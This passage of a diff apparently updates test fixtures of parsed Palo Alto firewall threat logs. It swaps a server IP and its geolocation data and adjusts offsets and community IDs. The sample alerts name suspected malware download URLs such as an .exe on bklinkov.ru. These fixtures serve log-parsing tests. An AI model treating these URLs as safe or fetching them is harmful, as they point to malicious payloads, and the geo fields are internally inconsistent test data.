-        "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/softwarefortubeview.40013.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/softwarefortubeview.40013.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -1560,9 +1496,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 6290,
+        "log.offset": 6260,
         "network.application": "web-browsing",
-        "network.community_id": "1:AuQEAPptnfXLW8oL/ac3CM4Gnnw=",
+        "network.community_id": "1:xHSG5OWliVYrQrcpFpqQQ8rABOQ=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -1597,13 +1533,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -1627,13 +1563,6 @@
         "client.port": 59296,
         "client.user.name": "crusher",
         "destination.address": "78.159.99.224",
-        "destination.as.number": 28753,
-        "destination.as.organization.name": "Leaseweb Deutschland GmbH",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "DE",
-        "destination.geo.country_name": "Germany",
-        "destination.geo.location.lat": 51.2993,
-        "destination.geo.location.lon": 9.491,
         "destination.geo.name": "Germany",
         "destination.ip": "78.159.99.224",
         "destination.port": 80,
@@ -1657,7 +1586,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 6720,
+        "log.offset": 6688,
         "network.application": "web-browsing",
         "network.community_id": "1:v73LbTZDPLO+1dzNRixeZAmolJ0=",
         "network.direction": "inbound",
@@ -1724,19 +1653,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59280,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -1747,7 +1672,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,\"allowedwebsurfing.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,\"allowedwebsurfing.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -1759,9 +1684,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 7132,
+        "log.offset": 7100,
         "network.application": "web-browsing",
-        "network.community_id": "1:IRI0j5xLyLhwaONpy7gVZdl/Qow=",
+        "network.community_id": "1:Qa15R3rz4GWk8OTZoeYfdAqCt1M=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -1796,13 +1721,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -1824,19 +1749,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59281,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -1847,7 +1768,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,\"antivirus-remote.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,\"antivirus-remote.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -1859,9 +1780,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 7537,
+        "log.offset": 7503,
         "network.application": "web-browsing",
-        "network.community_id": "1:/tG+YfZ8qFKrUDfQ7EThCBXci9Y=",
+        "network.community_id": "1:8GDPB5ZfeGIOX/3DLPuYG5D0Gko=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -1896,13 +1817,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -1924,19 +1845,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59282,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -1947,7 +1864,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.cfg\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.cfg\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -1959,9 +1876,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 7941,
+        "log.offset": 7905,
         "network.application": "web-browsing",
-        "network.community_id": "1:Vfi4CxQayypb3DoxclNfeNjXdjo=",
+        "network.community_id": "1:0Ma3cvskYuynmIkvb9KtKByU6JA=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -1996,13 +1913,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -2025,19 +1942,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59290,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -2048,7 +1961,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,\"blogsexnakedgirlxxx.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,\"blogsexnakedgirlxxx.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -2060,9 +1973,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 8348,
+        "log.offset": 8310,
         "network.application": "web-browsing",
-        "network.community_id": "1:2UbFMV1DsXMB0b/AUotNCCsHm0s=",
+        "network.community_id": "1:xYos/Wgi+h9Q+dddrLHkE05fDcY=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -2097,13 +2010,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -2125,19 +2038,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59286,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -2148,7 +2057,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -2160,9 +2069,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 8755,
+        "log.offset": 8715,
         "network.application": "web-browsing",
-        "network.community_id": "1:M8DHGZjrHyuCRpC9MNNfDUke5g4=",
+        "network.community_id": "1:rCE7GRimBj3QOL9WyI+CJq1w2hU=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -2197,13 +2106,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -2226,19 +2135,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59275,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -2249,7 +2154,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -2261,9 +2166,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 9162,
+        "log.offset": 9120,
         "network.application": "web-browsing",
-        "network.community_id": "1:AVMiOufq2owuhWpcu/TfRJ38tv4=",
+        "network.community_id": "1:3XOAuMIA4BGVLvrD2qCIXiQJjzI=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -2295,13 +2200,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -2321,19 +2226,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59277,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -2344,7 +2245,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -2356,9 +2257,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 9555,
+        "log.offset": 9511,
         "network.application": "web-browsing",
-        "network.community_id": "1:/+Opb16c1ye6uLeu1/TNC+SGnYs=",
+        "network.community_id": "1:fWPYdsanjAyyuvglU9X63EBU5rY=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -2390,13 +2291,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -2416,19 +2317,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59276,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -2439,7 +2336,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -2451,9 +2348,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 9948,
+        "log.offset": 9902,
         "network.application": "web-browsing",
-        "network.community_id": "1:uslltTePy/m8Gxhk/MgPbZfk6Rg=",
+        "network.community_id": "1:0JDdHMQ/vA//AOa5kReESUaG4Zc=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -2485,13 +2382,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -2511,19 +2408,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59278,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -2534,7 +2427,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -2546,9 +2439,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 10341,
+        "log.offset": 10293,
         "network.application": "web-browsing",
-        "network.community_id": "1:WiUImNtgjkeNDi1Qigg7+Y6pDAg=",
+        "network.community_id": "1:vkRizl1InTFzh8mosWRsH13M1kE=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -2580,13 +2473,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -2606,19 +2499,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59279,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
